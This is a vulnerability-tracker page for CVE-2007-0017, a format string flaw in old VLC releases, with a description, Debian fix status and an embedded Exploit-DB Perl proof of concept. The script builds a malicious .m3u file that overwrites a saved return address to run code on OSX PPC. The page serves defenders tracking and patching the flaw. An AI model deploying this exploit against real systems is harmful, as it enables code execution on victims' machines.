CVE-2007-0017

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-3069 dos osx verified perl · 1 KB

MoAB · 2007-01-02

VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)

perl exploit Source: Exploit-DB

#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#

# 0xf02031d2:      "--? 0j? 0h%11$hn.%12$hn", 'X' <repeats 177 times>...
# 0xf020329a:      'X' <repeats 200 times>...
# 0xf0203362:      'X' <repeats 200 times>...
# 0xf020342a:      'X' <repeats 200 times>...
# 0xf02034f2:      'X' <repeats 194 times>, "ZY"
# 0xf02035b7:      ""
# 0xf02035b8:      'X' <repeats 16 times>, "? 5?\005\017G?? 60"
# 0xf02035d5:      ""
# 0xf02035d6:      ""
# 0xf02035d7:      "\004\005\016

$format =
# make it more robust yourself... I'm lazy
# land in 0xf020 3362 - middle of shellcode
# "%2511%24hn.%2512%24hn" .
#
"%25" . (0x3362-0x24) . "d" . "%25" . "11" . "%24" . "hn" .
"%25" . 0xBCBE . "d" . "%25" . "12" . "%24" . "hn" ;

# 0xf020 3068 saved ret for MsgQueue()
$writeaddr = 0xf0203068;

open(PWNED,">pwnage.m3u");

print PWNED "#EXTM3U\n" ."udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format ."i" x (999 - length("Can't get file status for ") ) ."\n";

close(PWNED);

# milw0rm.com [2007-01-02]

EDB-3070 local osx verified

MoAB · 2007-01-02

VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String

Source code queued for fetch — refresh in a moment.

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.8.6-svn20061012.debian-1.2`
sid	Fixed	`0.8.6-svn20061012.debian-1.2`
forky	Fixed	`0.8.6-svn20061012.debian-1.2`
bullseye	Fixed	`0.8.6-svn20061012.debian-1.2`
bookworm	Fixed	`0.8.6-svn20061012.debian-1.2`

References

https://security-tracker.debian.org/tracker/CVE-2007-0017

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.